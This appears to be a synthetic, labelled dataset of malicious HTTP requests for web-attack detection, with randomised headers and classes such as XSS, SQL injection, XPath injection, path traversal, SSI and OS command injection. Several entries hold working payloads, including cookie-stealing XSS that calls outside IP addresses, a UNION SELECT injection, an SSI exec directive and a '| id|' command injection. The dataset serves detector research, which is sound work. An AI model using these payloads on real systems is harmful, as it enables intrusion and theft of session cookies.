utr1=<!--    #odbc  statement = "select    isa2zt,  vi1tn,     ei4ttr from trnrE   order  by    9,   033,   1"  -->&tmdiag3ttsxhtao=53796&cb7L=enteimRGhotsajaao&rk1vsc2=wigs&edooebGx6naqo=054&6eohpe3l9aweo=tolbsasai

End - Id: 40777
Start - Id: 49992
class: XPathInjection
POST /Kf9MHfFh/KucJnACK/i-u/rlHVwB-qj.RxGaG.@rO7/6mdcz/eicrkoyf/uPnbep3iectc/a_5oz-iaj2/eLYRMD_0wW0rh-f-/o5jt0yi9/etehlwaettdawaD/JRnzvbscriptGI.pl? HTTP/1.0
Content-Length: 176
Content-Language: ahljme,i,wpoa7h8
Content-Encoding: deflate
Content-Location: http://www.wEaei.cz/8wmhem/lilpee/wsee97ie/u5Luk.jsp
Content-MD5: YW5IOXRjYzdoZ0NaZHU1cg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Jul 06 05:23:58 UTC
Last-Modified: Thu, 31 Dec 09 12:12:52 GMT
Host: 159.88.212.147:4300
Connection: close
Accept: audio/x-wav, video/*;q=0.9
Accept-Charset: utf-7, x-mac-arabic, iso-8859-6, x-mac-ce;q=0.4, iso-8859-9;q=0.1
Accept-Encoding: 4  or 1<   sakrcd/rtse/nB4/child::text()[position()=81]   or    7='] | /* | /foo[bar='
Accept-Language: mtew-eqot, a-orn1i, Ce-ti;q=0.6
Cache-Control: only-if-cached
Client-ip: 89.188.193.205
Cookie: fh=3599108
Date: Wed, 18 Nov 09 08:22:05 GMT
ETag: "B@Z_FoQ6sHQt.m-"
Expect: aef0
From: Hrtiy@r0sqSkft.de
If-Modified-Since: Fri, 13 Oct 06 14:31:55 GMT
If-Unmodified-Since: Sun, 11 Dec 05 19:38:23 GMT
If-Match: *
If-None-Match: *
If-Range: "blQg3L0Ju0EECMW"
Max-Forwards: 400
MIME-Version: 2.4
Pragma: anhe8=t9eenaos
Referer: /smt3es9e.exe
TE: deflate,deflate;q=0.3
User-Agent: roxsle8b (brOUkmqF; ic@sqq4KGU; tDHThun; nWADZK@sD; eXg8WCF)
UA-CPU: x86
UA-Pixels: 431x444
Via: FTP/9.8 191.115.53.215, 4.9 www.tsHe.js:706
Transfer-Encoding: gzip
X-Serial-Number: 17039925669165
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

RCreeoets=38348856&ue=jdiva/t8$ahlaaefezemail&dV36Ch60KIkT=nHn&rikzhmcsdnOr=rsye&Iaron5d=b;|tst82nk&_-oF6KhAN=x2itblirOwOia&0PinA=:&ie1htrTta=ritg4iuuclIo&hbnmae=c es

End - Id: 49992
Start - Id: 47860
class: XSS
GET /rfkciidavrsxzsrrreD/9dnqe8ese/B_GUrcpyN1T/rnsaetlmc/aqhuHnjWsyA/gN1UgAhomeZsIl-y/5sraretdeEarsi/gUDGzUxO0rjd0cb3j.bin?nsi7dbnt=4&ootoomelznO=%3Cimg++src++%3D+++%22+javascript%3A%5Bwindow.open%28%27http%3A%2F%2F176.90.145.15%2Finat.pl%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&ny6i=%5D%5Dbo HTTP/1.1
Host: 39.208.184.127:2
Connection: arial
Accept: video/mpeg;q=0.4, application/*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, identity;q=0.3, deflate, deflate, deflate;q=0.7
Accept-Language: ral-unUauh, iedmwen-scwa8, da-abbr;q=0.9
Cache-Control: uytldd=a7tcah
Client-ip: 183.238.40.26
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="7"
Date: Fri, 10 Aug 07 16:33:11 CET
ETag: "kQpQuL2OtT0Pu4qpGwt5"
Expect: teast5=egohe9Eo;ieasj=rsrnmih
From: 5uawbe5@Rlotbsnho.net
If-Modified-Since: Mon, 13 Oct 08 19:18:02 UTC
If-Unmodified-Since: Wed, 24 Mar 04 17:15:39 UTC
If-Match: "s52Zv4L01-S3.8qO2C2"
If-None-Match: "zXFeF.rsiCT_wYWl2jd"
If-Range: Fri, 20 Jul 07 05:27:58 CET
Max-Forwards: 7574
MIME-Version: 9.4
Pragma: Eo4o='uiChtr'
Proxy-Authorization: Basic aWZueGpkbjp3bWVuaDc=
Authorization: Digest opaque="dafoil"
Range: 595606-7,222673-07
Referer: /FlNLa/anwtaehm/ideiueb.mdb
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: phritMojd5eotb4jtynf
UA-CPU: StrongARM
UA-Disp: 4309,162,32
UA-Pixels: 3411x5439
Via: 0.0 11.23.197.132, osa/1.0 www.sFraw.tiff
Transfer-Encoding: compress
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 420 163.148.232.91 "lraIhepmpe4o3l" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47860
Start - Id: 42384
class: SqlInjection
GET /vJAK5JCiBbgsoundftp/i0F4688ztyjT4-1OxS-P.js?bA5=o.5C-kWhh&seesrMamsn=l4tad7ieig&rsi=62467&iy=s%5C5&nCayAtIs=%27+%29+UNION+++++ALL+++++SELECT+++++Cie5EpAn++%2C++++itAws+%2C++idle+FROM+++pcohvwndig++WHERE+++kngazLtree++++NOT++IN++++%28+%27tanb%27++%29++++AND+stOoaI7++++NOT+++++IN+++%28+++%27udh%27++%29+AND+++++%27%27++++%3D+%27&qePihveislaysi1=gdlsystemsdyI%3Ebin&rhdmonjnnzgitte=56&alaob=hvberlusrtngllMa5x&Ef1tczcdi=1&sTaao3a=122&ReisswN2=jCokj6okM HTTP/1.0
Host: 45.61.24.73
Connection: keep-alive
Accept: text/*;q=0.3, video/quicktime;q=0.3
Accept-Charset: x-mac-greek;q=0.9, windows-874, windows-1255
Accept-Encoding: deflate, deflate;q=0.9, gzip;q=0.7, gzip, identity;q=0.0
Accept-Language: *;q=0.8
Cache-Control: min-fresh=765
Client-ip: 237.97.207.139
Cookie: hMmihrnnHiimS=weaziugd9ol8uiie;f5nimdd3=o T;tlLxui=1JbQZOX0bwr6;shetae6rhErs=7804
Cookie2: $Version="17"
Date: Fri, 16 May 08 02:57:02 UTC
ETag: "tN-IZ4t1Xvz3PGGu4c"
Expect: adsnMlj
From: nU8g@Ctnnlleoe.st
If-Modified-Since: Sun, 18 Dec 05 03:49:48 GMT
If-Unmodified-Since: Sat, 29 Jan 05 07:29:14 UTC
If-Match: "nWFKd8DxQFSfIkc"
If-None-Match: *
If-Range: "xTzakPSmG.D.Q2WIE"
Max-Forwards: 0
MIME-Version: 9.3
Pragma: gnhveo='Di9m1X'
Proxy-Authorization: Digest algorithm=idt1rt
Authorization: oeifa renlcmT=aansato
Range: -58,988-4242
Referer: http://sqtstl.biz/plr6maie/shnOu2/hjsgga.tar.gz
TE: trailers,gzip
Trailer: Cache-Control
User-Agent: ni0t7yv/4.1
UA-CPU: 68000
UA-Disp: 8289,132,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 6.5 15.102.10.152, FTP/3.7 31.11.82.172, 6.4 www.3eztIizt.htm
Transfer-Encoding: compress
Upgrade: TyteS/4.7, iaa/1.6, irg/7.1, 8lsno/4.8, era/0.2
Warning: 999 147.111.219.75 "f2re1Ss" 
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42384
Start - Id: 50015
class: XPathInjection
PUT /nph-G-cWephpfA/Areatotfol/ooetfsivulwhuuhh0/o58NzBdgWWM1To3BbP1.css? HTTP/1.0
Content-Length: 62
Content-Language: zge1mahi,T4
Content-Encoding: identity
Content-Location: /p8ira7et.pdf
Content-MD5: cnNpbnR3N3JyYTluc3JyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 May 09 17:23:13 UTC
Last-Modified: Tue, 04 Sep 07 07:19:57 CET
Host: 248.97.92.106
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987, isiri-3342;q=0.6, x-mac-arabic;q=0.4, windows-1257;q=0.9
Accept-Encoding: 
Accept-Language: eoso-onrehdel;q=0.4, oSRoR-7lf, wee2ws-9dx;q=0.5, a5er-ii6Nt;q=0.0, laahtnr-7;q=0.5
Cache-Control: ueith=wimlot
Client-ip: 63.108.226.5
Cookie: eB=%shutdownhdztmpprCTecq;y32whtaccesT3Tdf=256524
Cookie2: $Version="209"
Date: Tue, 23 Dec 08 09:15:24 UTC
ETag: "eWyaN0C-S@Xf4fG2R"
Expect: a0eysadl=eytmxc
From: Ecil@targ.fr
If-Modified-Since: Mon, 11 Apr 05 13:41:07 UTC
If-Unmodified-Since: Tue, 27 Jul 04 23:40:35 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Sep 09 06:43:37 GMT
Max-Forwards: 54
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bGZJdHM0c2dvbGVTZkFkd09yc2E1QmRlZGlyc3Rjb25pOWZnZXRzOUk=
Authorization: NTLM ZW5yZUU5b2Rycm5waWlyMzRJanNvcjZzYXBpYXJyb2FnTmdMaUFhcg==
Range: 1-0902
Referer: http://sm4sja.net/peripj/o9xeatca.asp
TE: trailers
Trailer: Date
User-Agent: enfr7eh' or     yn/a/child::node()[processing-instruction()=28] or 'hoy8il'=   '
UA-CPU: Sparc
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9581x753
Via: 1.2 www.edxba.shtml:148, 4.8 www.iRteeb.htm, hts/7.0 172.214.184.157:938
Transfer-Encoding: os1u83; njrttHu=efnd
Upgrade: 3nj/9.8
Warning: 564 52.222.167.222 "leuooidehona9x22" "Wed, 27 Jun 07 17:18:35 GMT"
X-Serial-Number: 1430325
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

0HTbof=ebs&emA=lm&yoxSontSettW6n7=ef|xhtl|e&deaAzeuuid5=53

End - Id: 50015
Start - Id: 45695
class: PathTransversal
GET /4R/rl82dtuotsiu.swf?qeoLeaDm=qeAdh&b3usLeort1o5o=34469&s2Et=ldekvaqtgon6rer&DcopySeYb=87&nfaIhhnlhejcenn=S9elrloll2vhl&qbservicesBexec8wZ=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fvetisiieto%2Ftr%2Fesanchanse%2Fndni.asp&vFcFACEFL=rx9eyheAneEf&ggu4t0=d2woeHa&slhirh=7&wscnosG=sre-U&VI2MvZfNrusrGG=Kiel%3Dstii3dsQ%28S7s HTTP/1.0
Host: www.soi9noi.fr
Connection: lil7
Accept: */*
Accept-Charset: windows-1252
Accept-Encoding: identity;q=0.1, deflate, identity
Accept-Language: *;q=0.8
Cache-Control: min-fresh=868
Client-ip: 24.162.161.227
Cookie: esuos=1t1hen6rmd;DTvSTM-=uaws;scasen1on=7269679;d8aVaaaoz=fynxEDoDxWG;s5e2H1eehs=5 hghttp)t|h
Cookie2: $Version="746"
Date: Tue, 11 Jul 06 17:16:50 GMT
ETag: "VHa4Nom4Fc_0gLMYw6WP"
Expect: 100-continue
From: er2eer@a9hr.uk
If-Modified-Since: Wed, 01 Jun 05 04:33:33 GMT
If-Unmodified-Since: Fri, 01 Apr 05 02:51:55 GMT
If-Match: *
If-None-Match: *
If-Range: "uI3J2d3rGW5NAp2fMVa-"
Max-Forwards: 5317
MIME-Version: 5.2
Pragma: mCsstzas='lts'
Proxy-Authorization: Digest realm
Authorization: iauui tpnx43o=hneenas
Range: -934,-807,-703421
Referer: http://www.bbihrzc8.ch/ynesjse/hi2np/assTetaa/htsgeWg3/etutty.pdf
TE: chunked;q=0.9,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: lumeq/0.7.5.5
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6938x271
Via: HTTP/1.3 www.eapop.jpg:65, mc3/1.1 157.220.38.46, 1.6 www.tna7l.gif
Transfer-Encoding: deflate
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45695
Start - Id: 45997
class: PathTransversal
PUT /nmwcimeerhbssston/LLdcX3n/xKnq61cf/yhioHatreg3b2uItm/WA.I4jZi/mXL5E/8mK6@.php4? HTTP/1.0
Content-Length: 238
Content-Language: s,0
Content-Encoding: compress
Content-Location: http://www.zXu4nyl.uk/nEywraLt/gePwre.js
Content-MD5: ZkJ1aFNzbmtudHlTcmh0dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Dec 06 21:07:07 UTC
Last-Modified: Mon, 26 Sep 05 06:24:46 CET
Host: www.gyr60enla7.ch
Connection: SenUfs2i
Accept: application/rtf, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-ltihj2tn;q=0.5
Cache-Control: t='haGerom'
Client-ip: 43.254.7.157
Cookie: WELtgcmb6tkB=../../../../../../../../../usr/yo.bat
Date: Mon, 29 Jan 07 01:59:34 GMT
ETag: ".OJXtIXHMTDLuwgpLDY0"
Expect: 100-continue
From: h4leog@lneuabul.uk
If-Modified-Since: Sun, 09 May 04 09:50:32 UTC
If-Unmodified-Since: Tue, 17 Aug 04 10:30:57 GMT
If-Match: "Tu6k@22W6b6PD63uN6"
If-None-Match: "ILy_djoiX7VOzWt0"
If-Range: "vYuzDn8ACGVa9C.nQANC"
Max-Forwards: 6
MIME-Version: 8.3
Pragma: l='iOunetl'
Authorization: Digest algorithm=MD5
Range: 44665-,552-,1-
Referer: http://www.yiEsair.st/uoLAh8hn/eozRn.rar
TE: gzip,chunked;q=0.6,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.2 (Machintosh; U; PPC 8.4; th-vh; rv:8.9.6) Gecko/65451693
UA-CPU: Sparc
Via: 5.1 www.EtalOhfg.shtml, FTP/3.3 www.f2Hin.gif:90
Transfer-Encoding: deflate
Upgrade: vysgb/3.2, qh8Atn/8.2
Warning: 820 150.29.252.130 "mcb2NdatgsdhTOusu2o" 
X-Forwarded-For: 225.208.230.238
X-Serial-Number: 30022157350213308791
~~~~~: ~~~~~~~~~~~~~~~~~

Rtmau=ltemrrh9rro7el&nZliscriptlinkoQ=o&so6=eOs&wJJ%uD69cmdctCU=n&asrearaho=kKtXTqYcSk%40l&5foknt=hBt&ZwIJx3=a24orjsueiX3dth&sdsouesh=cdDTgZlRata&t7iaiiDinnuaEye=dh6rpr98tul7ten6r&yt7i=ilieenotvEayojdi&tRepo=jorwnseeqbAxrztRn&lrlsxery=z7f

End - Id: 45997
Start - Id: 35885
class: XPathInjection
GET /IuuysesyalsO7/Fwhere/eLlSM/ST3obmtu3onvtoo/c31ta6OKBIef_X8U/ooq@Jgt-NyGa/UGtRXbUJTH1/iYU@cUJXvQR2n.o/a5nmB-oqihdI3EFn/eurtneicectty/Stenaest.html?IT_xg=wdusIeutt&e2q=395&JWkO4MDRcnull2=aUmeteyfcd%5C&coainasrOrsfr7=0i%29&thuinsOtIrsed=t&skatR=nA3vqhPhB&ahpinciuuuek6e=62809936&ieFc=Eondrn4pae1nNtKe&TxacfHkna=51&opdediihtts4b=Ag0tc&datwgoser=lSi&oHAxmlzse7UxM=qfztv&uKn8JOjv.Ic=129719&4a2wrSn7eerppi2=ah%27%5D+++%7C+++P+++%7C++%2F%2Fuser%5B+++++name%2Ftext%28++++%29+++%3D++++%27af&1rkx3Fx9SNVO=0065922223 HTTP/1.1
Host: www.e5oftt.uk
Connection: tiet
Accept: audio/*;q=0.3, application/*
Accept-Charset: euc-cn
Accept-Encoding: 
Accept-Language: oeIuesn-sthuks5t, 7nnn-97rams;q=0.3, Fuong-nqofs8tH, nn-hpkhtya;q=0.6
Cache-Control: eneEehaq=Scidrwv
Client-ip: 204.135.13.34
Cookie: l0ysttdtsneOyoe=tquPwP
Cookie2: $Version="26"
Date: Sat, 01 May 10 07:27:41 CET
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: rlonTO@qo42edtplj.org
If-Modified-Since: Mon, 11 Aug 08 11:57:40 CET
If-Unmodified-Since: Sun, 09 Dec 07 04:05:13 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Feb 05 15:05:27 CET
Max-Forwards: 153
MIME-Version: 8.2
Pragma: hasrLrae='nr6'
Proxy-Authorization: NTLM Znd0cmRja0FndHk4bnhmMG9kY2xtdWszbmdBbmk0ZXlhb2l0ZDUyM29u
Authorization: Basic SW9kY241cW06d3JydA==
Range: 3-18807,30473-219,305975-44534
Referer: /yfcpN8bs/eeso/9c2Ttiur/c15eai.php4
TE: trailers
Trailer: Via
User-Agent: eNdnfnnue (rhtZav)
UA-CPU: x86
UA-Disp: 7612,056,16
UA-OS: Linux
UA-Color: color16
Via: FTP/2.1 www.stwb.css:8, 6.8 96.42.220.153, 5.5 108.14.113.230:3072
Transfer-Encoding: gzip
Upgrade: lcMte/6.9, el3/2.6, eorKne/2.7, ennt/1.8
Warning: 976 www.IFve.html:3865 "sMusnctqhhiy2" "Tue, 15 Dec 09 23:16:42 UTC"
X-Serial-Number: 160475
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35885
Start - Id: 48580
class: XPathInjection
PUT /noAso0omt2/nPMUaal0hGqs3n4-/jayat3Deaqhpo5iFif/y3m_Yr/oT7doTrarceoeyclitl.png? HTTP/1.1
Content-Length: 327
Content-Language: 2arxs,ieuekia
Content-Encoding: gzip
Content-Location: /man2orns.wmn
Content-MD5: bWxFZWFuSHN1ZTJyaGllTw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Dec 08 08:23:05 UTC
Last-Modified: Mon, 12 May 08 13:24:56 CET
Host: www.gheglet.ch
Connection: 8itAmlQe
Accept: image/*, text/*;q=0.0
Accept-Charset: euc-cn;q=0.6, iso-8859-5, windows-1251, hz-gb-2312
Accept-Encoding: identity, identity, gzip;q=0.9
Accept-Language: nmep-gt;q=0.9, f3-riaooe;q=0.5, Ejaklee-svf;q=0.6
Cache-Control: min-fresh=81597
Client-ip: 58.151.109.14
Cookie: c6ino=hTyohhnohh;nezahmuacoFdcae=TyasOm;9PechoElXD=uhsw&)Ta-;itmissyeLnnot=ygbAou..I1wQ;eore=s@I3cW.qd07;gAK8passthru8328Es=77752
Cookie2: $Version="380"
Date: Mon, 09 Jul 07 22:10:32 UTC
ETag: W/"wzyFfsVJbcrHNUf"
Expect: iJvsn=ronjlII
From: kvhmage@1ptmhTa.org
If-Modified-Since: Wed, 26 Jul 06 02:05:21 CET
If-Unmodified-Since: Tue, 29 Aug 06 23:27:33 GMT
If-Match: "EezgoY@xNeRCtugFgwNI"
If-None-Match: "UWxqNYqQG4PHPzk"
If-Range: Thu, 16 Oct 08 24:50:23 CET
Max-Forwards: 8566
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic aXJEenRldGs6cndhY3Q=
Authorization: htnNnv en2g=pencllpe
Range: -13,5-
Referer: http://www.t0dre.net/t5F3e/mhsenoS/imnlu/LygU/2htSSrSi.png
TE: trailers,trailers
Trailer: Date
User-Agent: d3ty/9.9.5
UA-CPU: Sparc
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 316x0903
Via: HTTP/4.0 www.iynhoepn.jpg, FTP/1.9 www.Tomtrjy.gif, HTTP/2.7 53.239.190.128:3965
Transfer-Encoding: compress
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 7270498522514093
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

lfpbObnEAuta=087187712&enFhluAs=tiuoe&etdden=01991395&T0_0S=217&nmccgnx=n8rywses'   or    count(   path/child::node()[position()=((   i  +    j+k + l   +1)] | path/child::*()[position()=(k+1)])=1   or  'dIsg'   =  '    agsbey'     or&YR-29hu.=3140

End - Id: 48580
Start - Id: 46958
class: XSS
PUT /moEjolnxuncehe/h2-NNkc0StmU3/n7j55vLehTQDr/lPhW7VA3.gif? HTTP/1.0
Content-Length: 306
Content-Language: e
Content-Encoding: compress
Content-Location: http://CpfEj.net/h7qul/eiAbeia.exe
Content-MD5: eHJldGFoaGFyYWVhM3VpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 Apr 05 08:29:42 GMT
Last-Modified: Sat, 09 May 09 01:41:35 UTC
Host: 146.159.114.111
Connection: close
Accept: */*
Accept-Charset: windows-1250;q=0.5, shift_jis;q=0.5, x-mac-turkish
Accept-Encoding: 
Accept-Language: *
Cache-Control: 2a=xg
Client-ip: 15.111.69.143
Cookie: drVFelniocUdi=A drfe;1ytspu2=fselectis'r=q2te0d;fdtni4khi=je09lr;isClisslKenratq=2026474687;nrta=wUE;5ZXCCtONUv4P=451
Cookie2: $Version="609"
Date: Thu, 08 Apr 04 04:16:31 GMT
ETag: "NViduy7oqvlSc-i"
Expect: 100-continue
From: trhir@9toer.gov
If-Modified-Since: Fri, 09 May 08 07:46:37 GMT
If-Unmodified-Since: Tue, 05 Feb 08 20:46:30 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Mar 10 13:20:16 UTC
Max-Forwards: 709
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic b2hpb246UnlyOU9xZA==
Authorization: echMmd VljPnr=nbrGo
Range: 7-,-974,384-64
Referer: http://6se5hol.ch/sncnrhNQ/mDgIis.avi
TE: trailers
User-Agent: Mozilla/5.2 (compatible; MSIE 8.1; Mac OS X; Paaue; anws3; ou8ssfetea)
UA-CPU: x86
UA-Disp: 698,9133,32
UA-OS: FreeBSD
UA-Color: color16
Via: 8.2 www.RUnn8ob.html, 6.4 65.123.252.221
Transfer-Encoding: gzip
Upgrade: aef/2.4, poaoke/2.0, 3hsnf/0.2
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NnAh=5759&oimo=302&codezBrr0fus=vjs&_LDFB0OGDUL.=<xml  id=  "     X "><a ><b>&lt;script  >[window.open('http://130.235.111.81/taitil.mdb'+document.cookie);]&lt;/script   >;</b></a  ></xml   >&binsvRUA=59a3e&6teeoilhz=dcnimnx&Fed=3

End - Id: 46958
Start - Id: 39164
class: SSI
GET /r_JDBl/kSmLBahcInrzQjfWH/oGt8fSLIfq68WjN/0Na4/FvdA/eA8ytzhreiiEl6d/Rchild1G.YadminHL@aJ/prlx5uLs/oh2wfNRNM2LfdcjgzLdI/aW1Q5-W/lnet.jpeg?ehd6toE4=174&ieeanen66hs=synb&rvtdEe=l&iayhonis=lse-%3EiEeaegt+t&ooTteyd1eb=al0ro&blsI=g0P2m-H&eseOlse=4&uaafsiat=254&ooNuaaLyt=ror&e09Ogroup by8Qid=sgo5&catNDs=5754&3FetcQ=l+O&XkBj95hdoNnetcatn=ihv_P85&xeniioli=2&esz7sevlhtbmbRu=84 HTTP/1.1
Host: 179.250.249.7:71
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a-Pe
Cache-Control: only-if-cached
Cookie: GCIDdropg.xC1O=<!--#exec   cgi="/cgi-bin/script?rnG" -->;noer8ett=nehe;ZJpasswdPD=8A;9breufct=nand&<s
Cookie2: $Version="679"
Date: Thu, 29 Apr 10 12:12:44 GMT
Max-Forwards: 43
Proxy-Authorization: NTLM bzBsNGVoaW55b3JldTZkbG5idG90ZTZsbHV5aG9jRXVlZQ==
Referer: /3sNu09/nciem.png
User-Agent: Mozilla/7.1 (X11; U; Open BSD i386 2.1; ee-Qw; rv:2.3.1) Gecko/28338521
UA-CPU: 68000

null

End - Id: 39164
Start - Id: 47915
class: XSS
GET /tRZB0kc/vojfa0i/Se2dtanlioaee/semoeih/Ep/e@lUeNSjkkP6M5OFX3_j/Bvxk0OmB68zVIWB/snfelLual6gahmlt/twEC.NHa2/rdesniOgsOmrNieDQe.bin?KDZW6=etyt1sYjF&okframvatoo=%28zh&0PD64xQk=%3C%21%5BCDATA%5B%3C%21--%5D%5D++++%3E%3Cscript++%3E%5Balert++%28%27nd1lsteP%27%29%3B%5D%2F%2F--%3E%3C%2Fscript++++%3E&k61hnode2ERBEFecho=nzckC2-ziDA&uOi7SwMjMesH=varAaA&2gttQiaDmu=1688853&deT=+nend HTTP/1.1
Host: 174.106.171.187
Connection: keep-alive
Accept: image/jpeg;q=0.0, application/*;q=0.6
Accept-Charset: iso-8859-8-i;q=0.4, big5;q=0.8, iso-8859-5, x-mac-japanese, iso-8859-4;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 93.12.193.202
Cookie: 7FUacceptxQwWmzo=wd6f25Ij0p;i5wemclsid1aosI=<aeaapshttpaeyIwnthe;7Y46wZk=i0n
Cookie2: $Version="7"
Date: Sun, 17 Jun 07 14:11:09 GMT
ETag: W/"cJc-HCc20ZvA@@p"
Expect: miJlaez
From: 4ebutle@EleUossins.org
If-Modified-Since: Tue, 01 Sep 09 11:55:50 UTC
If-Unmodified-Since: Fri, 17 Jul 09 04:45:45 UTC
If-Match: "G8@J4gzT6_jbAXe4ANwj"
If-None-Match: "kF-F9w5nbD2A0l1"
If-Range: Wed, 02 Apr 08 12:23:45 UTC
Max-Forwards: 366
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic emllZWVlOnpnYWU=
Authorization: NTLM ZXNnc25vdG5uZGVjTWhpZThyNjdlaXRya3B0ZHNpb3N0dXpyeWZvcnR4
Range: -419,3-
Referer: http://echuut.org/mppa/necl/s6iletbY.bin
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: t7otariIegei
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: l5wfb/8.9 www.wntd.png, biI/4.3 22.76.168.86:48658, esV/7.9 www.0Xoptaee.htm
Transfer-Encoding: gzip
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 8754080340538
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47915
Start - Id: 42951
class: OsCommanding
GET /oAEFt0lLoPIw/q8atsEiiisPanish/pzhTTygYz-Q/niaonaaggann/e4q1COwoeto/cE5h/tWGCXvENjl/yjhDc63o@SCA/s2o3WD.GR.jpeg?updatebr0x=7o&foi1hnhpwetlfoE=04612162&ietba9joT=Shsreaap&eeettem=eou%40&xiEfh=e8tTn6&cofys=usSg&5etjttshsaptl=ka%3FisscriptShaprmA&i8ieatehbge=tpinsueevy1OsDxt&eb=7175&Esih6g=0nOllaao2rvaesth3r&uw=o8EYyh30FMY&uosssx4sbcnsv=%3AM HTTP/1.1
Host: 155.233.76.135:80
Connection: ee4apc
Accept-Charset: windows-1258;q=0.6, x-mac-arabic;q=0.8, x-mac-cyrillic, x-mac-turkish
Accept-Encoding: |    id|
Accept-Language: *;q=0.3
Cookie2: $Version="416"
Date: Fri, 29 Dec 06 03:57:09 UTC
ETag: "1i3rd3SAoW5S1_qVKI.Q"
If-Match: "xsWLkwPL@gDBAfR1"
Max-Forwards: 2401
Pragma: o4='geineR'
Range: -814,52-
Referer: http://vf9ereor.st/7lf2itp/TTsd/oswhem.htm
User-Agent: Mozilla/5.6 (Machintosh; U; PPC 8.2; H0-na; rv:4.6.8) Gecko/06150924
Via: 9.5 238.121.102.72, FTP/9.0 40.211.113.232:48659
Transfer-Encoding: osetyn; 9gdebmj=xg0Id1a
Warning: 737 228.253.18.4:47007 "LstemnzsetpdollbCme" 

null

End - Id: 42951
Start - Id: 45237
class: PathTransversal
GET ////? HTTP/1.0
Host: 169.77.222.134:7
Connection: IansToN
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: aufzi-aesax;q=0.4, uTk-Hdrm
Cache-Control: no-store
Client-ip: 83.132.12.183
Cookie: 79Tinputboot.ini2P=pNX0Fwh2Dsw;s1mrpxihnzeejos=6;hdnToohs=mu7ZE;AhsEa=e
Cookie2: $Version="8"
Date: Thu, 22 Jan 09 17:00:10 GMT
ETag: W/"t2Ytcd_RbO7gw0dHf"
Expect: eterw=afhcvs7t
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Fri, 30 Sep 05 20:40:57 UTC
If-Unmodified-Since: Sun, 29 Apr 07 07:15:34 GMT
If-Match: *
If-None-Match: "C.H7XAnMwTF16WeK"
If-Range: *
Max-Forwards: 5750
MIME-Version: 3.6
Pragma: y=gr
Proxy-Authorization: Digest qop=evai40
Authorization: Basic b1l0c2U6OHRuaUFscw==
Range: 220-5761,42620-
Referer: http://www.eaeeg.com/olsj/7nttM.css
TE: chunked;q=0.3,trailers
Trailer: Expect
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 3.7; nu-r5; rv:9.2.8) Gecko/26266987
UA-CPU: x86
UA-Disp: 568,3282,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: 4.4 176.45.158.137, FTP/3.3 144.100.8.10
Transfer-Encoding: deflate
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
